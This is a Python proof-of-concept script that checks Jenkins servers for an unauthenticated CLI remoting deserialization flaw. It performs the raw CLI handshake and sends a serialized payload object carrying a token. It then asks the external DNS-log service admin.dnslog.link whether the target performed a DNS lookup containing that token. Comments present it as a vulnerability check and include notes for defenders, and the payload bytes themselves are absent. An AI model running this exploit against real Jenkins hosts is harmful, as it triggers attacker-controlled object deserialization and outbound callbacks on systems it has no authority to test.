poc.py
#!/usr/bin/env python
# coding: utf-8
import sys
import base64
import socket
import urlparse
import requests
import hashlib
import time
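# Remote check for a Jenkins instance whose CLI remoting listener accepts a
# serialized object from an unauthenticated TCP client.
#
# Flow, as implemented below:
#   1. GET the web UI and read the CLI TCP port from the X-Jenkins-CLI-Port
#      response header.
#   2. Open a TCP connection to that port and send the CLI-connect preamble.
#   3. Send the remoting capability preamble followed by a base64-encoded
#      object that carries a per-run token.
#   4. Ask an external DNS-log service whether a lookup containing that token
#      was observed (presumably triggered by the object on the server side).
#
# Defender notes:
#   - The observable side effects are one inbound TCP session on the CLI port
#     and one outbound DNS query from the Jenkins host containing the token.
#   - The check cannot run when the CLI port is not advertised or not
#     reachable; restricting access to that port narrows exposure.
#   - The token and the timing of the test are disclosed to the third-party
#     DNS-log service, which is queried over plain HTTP.
if len(sys.argv) < 2:
    print('Usage: python %s <jenkins_web_url>' % sys.argv[0])
    sys.exit()

jenkins_web_url = sys.argv[1]

# Upper bound, in seconds, for each network operation so the script cannot
# hang forever on a filtered port or a silent peer.
NET_TIMEOUT = 10

# Correlation token only (not a secret). It is cut to 16 characters, the same
# length as the marker it replaces inside the object below.
flag = hashlib.md5(str(time.time())).hexdigest()[:16]
i_headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
}

print('[+] Send request to find CLI listener port from response headers')
response = requests.get(jenkins_web_url, headers=i_headers, timeout=NET_TIMEOUT)
try:
    cli_port = int(response.headers['X-Jenkins-CLI-Port'])
except (KeyError, ValueError):
    # Header absent or malformed: the CLI TCP listener is not advertised, so
    # report that instead of dying with a traceback.
    print('[-] No usable X-Jenkins-CLI-Port header; CLI listener is not advertised')
    sys.exit(1)
print('[+] Found CLI listener port: "%s"' % cli_port)

# .hostname strips any port, userinfo and IPv6 brackets; the original
# split(':') inside a bare except left such netlocs unparsed.
host = urlparse.urlparse(jenkins_web_url).hostname
if not host:
    print('[-] Could not extract a host name from %s' % jenkins_web_url)
    sys.exit(1)
cli_listener = (socket.gethostbyname(host), cli_port)

sock_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_fd.settimeout(NET_TIMEOUT)
try:
    print('[+] Connecting CLI listener %s:%s' % cli_listener)
    sock_fd.connect(cli_listener)

    print('[+] Sending handshake headers')
    # Two-byte length prefix (0x0014) followed by "Protocol:CLI-connect".
    headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
    sock_fd.send(headers)
    # The replies are read and discarded; their content is never inspected.
    sock_fd.recv(1024)
    sock_fd.recv(1024)

    payload_obj = "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".decode('hex').replace("b6bb02ed731ae8f2", flag)
    payload_obj_b64 = base64.b64encode(payload_obj)
    # Literal "<===[JENKINS REMOTING CAPACITY]===>" preamble.
    payload = '\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'
    payload += payload_obj_b64
    payload += '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'.decode('hex')
    print('[+] Sending payload...')
    sock_fd.send(payload)

    print('[+] Check result...')
    # Keep the connection open while the server processes the data, as the
    # original script did by never closing the socket.
    time.sleep(6)
except socket.error as exc:
    print('[-] CLI listener exchange failed: %s' % exc)
    sys.exit(1)
finally:
    # The original leaked the socket until interpreter exit.
    sock_fd.close()

# A miss is not proof of absence: egress DNS filtering on the Jenkins host, a
# callback slower than the fixed wait above, or an outage of the DNS-log
# service all produce the same negative answer.
resp = requests.get("http://admin.dnslog.link/api/dns/test/%s/" % (flag), timeout=NET_TIMEOUT)
if "True" in resp.content:
    print('[+] %s is Vulnerable' % jenkins_web_url)
else:
    print('[-] Not Vulnerable')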